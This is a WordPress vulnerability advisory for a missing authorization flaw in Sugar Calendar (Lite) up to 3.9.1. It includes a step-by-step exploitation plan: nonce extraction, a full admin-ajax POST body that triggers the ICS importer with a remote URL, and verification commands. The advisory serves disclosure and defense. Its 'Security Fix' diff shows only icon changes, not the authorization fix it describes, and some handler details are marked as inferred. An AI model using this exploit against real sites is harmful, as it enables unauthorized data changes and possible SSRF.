Sugar Calendar (Lite) <= 3.9.1 - Missing Authorization
Description
The Sugar Calendar (Lite) plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 3.9.1. This makes it possible for authenticated attackers, with contributor-level access and above, to perform an unauthorized action.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:NTechnical Details
<=3.9.1What Changed in the Fix
Changes introduced in v3.10.0
Source Code
WordPress.org SVN# Exploitation Research Plan: CVE-2026-24636 - Sugar Calendar (Lite) Missing Authorization ## 1. Vulnerability Summary The **Sugar Calendar (Lite)** plugin for WordPress is vulnerable to **Missing Authorization** in versions up to and including 3.9.1. The vulnerability exists in the handler for the…
Show full research plan
Exploitation Research Plan: CVE-2026-24636 - Sugar Calendar (Lite) Missing Authorization
1. Vulnerability Summary
The Sugar Calendar (Lite) plugin for WordPress is vulnerable to Missing Authorization in versions up to and including 3.9.1. The vulnerability exists in the handler for the sc_admin_importer AJAX action. While intended for administrative use (importing events, categories, and other data), the function lacks a proper capability check (e.g., current_user_can( 'manage_options' )), allowing authenticated users with Contributor-level permissions or higher to trigger data import processes. This can lead to unauthorized modification of calendar data or potentially server-side request forgery (SSRF) if an attacker-controlled ICS URL is processed.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Action:
sc_admin_importer - Vulnerable Parameter:
importer_slug,ics_url(if using the ICS importer). - Authentication: Required (Contributor level or above).
- Preconditions: The attacker must be logged in and possess a valid nonce for the
sc_admin_importeraction.
3. Code Flow
The exploitation flow follows the logic found in assets/admin/js/sc-admin-importers.js:
- Entry Point: The plugin registers an AJAX handler for
sc_admin_importer. Based on the JS, this is registered viawp_ajax_sc_admin_importer. - JS Trigger: The JS function
runImporter()orrunIcsImporter()sends a POST request:$.post(sc_admin_importers.ajax_url, { nonce: sc_admin_importers.nonce, action: "sc_admin_importer", importer_slug: m.runtime_vars.importer_slug, total_number_to_import: m.runtime_vars.total_number_to_import, ics_url: m.runtime_vars.ics_url // Used in runIcsImporter }, ...); - Vulnerable Sink (PHP): The server-side function (inferred to be
Sugar_Calendar\Admin\Importers\Ajax\handle_importor similar) receives the request. It verifies the nonce but fails to check if the user has themanage_optionsoredit_calendar_eventscapability. - Execution: The importer associated with
importer_slug(e.g.,sugar-calendar-ics) is executed, processing data from the provided URL or local environment.
4. Nonce Acquisition Strategy
The nonce is localized in the sc_admin_importers (or sc_admin_ics_importers) object. This script is enqueued on the Sugar Calendar "Tools" page.
- Identify Page: The "Tools" page is typically located at
wp-admin/admin.php?page=sugar-calendar-tools&tab=import. - Navigation: Log in as a Contributor and navigate to the tools page. Note: Even if the UI elements are hidden by CSS/JS for Contributors, the script and its localized data are often still loaded if the
admin_enqueue_scriptshook doesn't check capabilities properly. - Extraction: Use
browser_evalto extract the nonce:- Target Variable:
window.sc_admin_importers?.nonce - Alternative:
window.sc_admin_ics_importers?.nonce
- Target Variable:
5. Exploitation Strategy
We will attempt to trigger the ICS importer to fetch a remote file, demonstrating unauthorized control over the import process.
Step 1: Authentication
Log in as a Contributor user.
Step 2: Nonce Extraction
Navigate to the plugin's admin tools page and extract the nonce.
// Browser Eval
return window.sc_admin_importers?.nonce || window.sc_admin_ics_importers?.nonce;
Step 3: Trigger Unauthorized Import
Send an AJAX request to trigger the sugar-calendar-ics importer pointing to an attacker-controlled ICS file (or a valid public ICS URL to demonstrate the action).
Request via http_request:
- URL:
http://localhost:8080/wp-admin/admin-ajax.php - Method:
POST - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
action=sc_admin_importer&nonce=[EXTRACTED_NONCE]&importer_slug=sugar-calendar-ics&ics_url=https://raw.githubusercontent.com/manas-harsh/test-ics/main/test.ics
6. Test Data Setup
- User: Create a user with the
contributorrole. - Plugin: Ensure Sugar Calendar (Lite) <= 3.9.1 is installed and active.
- Remote Resource: Have a URL for a valid
.icsfile (e.g., a GitHub raw link) ready to be used in theics_urlparameter.
7. Expected Results
- The server should respond with a
200 OKand a JSON object indicating success or the start of the import process. - Example Success Response:
{"success":true,"data":{"importer":{"status":"completed","progress":...}}} - If the vulnerability exists, the Contributor will successfully initiate the import, which should be restricted to Administrators.
8. Verification Steps
- Check for New Events: After the exploit, use WP-CLI to check if events from the ICS file were created:
wp post list --post_type=sc_event - Check Capability Enforcement: Attempt the same request without a nonce or with a fake nonce to confirm the
noncecheck is active but thecapabilitycheck is missing.
9. Alternative Approaches
If the sugar-calendar-ics slug is not enabled or requires the Pro version, try using generic migration slugs that might be present in the Lite version's code, such as those targeting legacy plugin migrations:
- Slug:
sugar-calendar-lite-migration - Slug:
the-events-calendar(if migration tools for other plugins are present).
If the "Tools" page is strictly blocked for Contributors, check if the nonce is available on the main Calendar dashboard: wp-admin/admin.php?page=sugar-calendar.
Summary
The Sugar Calendar (Lite) plugin for WordPress is vulnerable to unauthorized access in versions up to 3.9.1 because it lacks a capability check on the server-side handler for the 'sc_admin_importer' AJAX action. This allows authenticated attackers with Contributor-level permissions or higher to initiate data imports, which could lead to unauthorized modification of calendar events or SSRF via the ICS import feature.
Vulnerable Code
// assets/admin/js/sc-admin-importers.js:583 runImporter(){ n.post(sc_admin_importers.ajax_url,{ nonce:sc_admin_importers.nonce, action:"sc_admin_importer", importer_slug:m.runtime_vars.importer_slug, total_number_to_import:m.runtime_vars.total_number_to_import },function(t){ ... }); } --- // assets/admin/js/sc-admin-importers.js:605 runIcsImporter(t=!1){ n.post(sc_admin_ics_importers.ajax_url,{ nonce:sc_admin_ics_importers.nonce, action:"sc_admin_importer", importer_slug:m.runtime_vars.importer_slug, total_number_to_import:m.runtime_vars.total_number_to_import, ics_url:m.runtime_vars.ics_url, clear_cache:t },function(t){ ... }); }
Security Fix
@@ -274,7 +274,7 @@ escapeKey: true, animationBounce: 1, type: 'orange', - icon: app.getIcon( 'exclamation-circle-solid-orange' ), + icon: app.getIcon( 'info-circle' ), title: sc_admin_importers.strings.heads_up, content: sc_admin_importers.strings.recurring_events_warning, buttons: { @@ -317,7 +317,7 @@ title: false, content: app.runtime_vars.strings.please_select_file, titleClass: 'sc-ics-importer-error-title', - icon: app.getIcon( 'exclamation-circle-solid-orange' ), + icon: app.getIcon( 'info-circle' ), type: 'red', buttons: { confirm: { @@ -593,7 +593,7 @@ title: false, content: responseMessage, titleClass: 'sc-ics-importer-error-title', - icon: app.getIcon( 'exclamation-circle-solid-orange' ), + icon: app.getIcon( 'info-circle' ), type: 'red', boxWidth: '400px', buttons: {
Exploit Outline
To exploit this vulnerability, an attacker must first authenticate with at least Contributor-level privileges. The attacker then retrieves a valid security nonce for the 'sc_admin_importer' action, which is often localized in the global 'sc_admin_importers' or 'sc_admin_ics_importers' JavaScript objects within the WordPress admin dashboard. Using this nonce, the attacker can send an AJAX POST request to '/wp-admin/admin-ajax.php' with the 'action' set to 'sc_admin_importer'. By specifying a target 'importer_slug' (such as 'sugar-calendar-ics') and providing an 'ics_url' pointing to an attacker-controlled file, the attacker can force the plugin to import malicious or unauthorized calendar data. Because the server fails to check if the current user has administrative capabilities (like 'manage_options'), the request is processed successfully.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.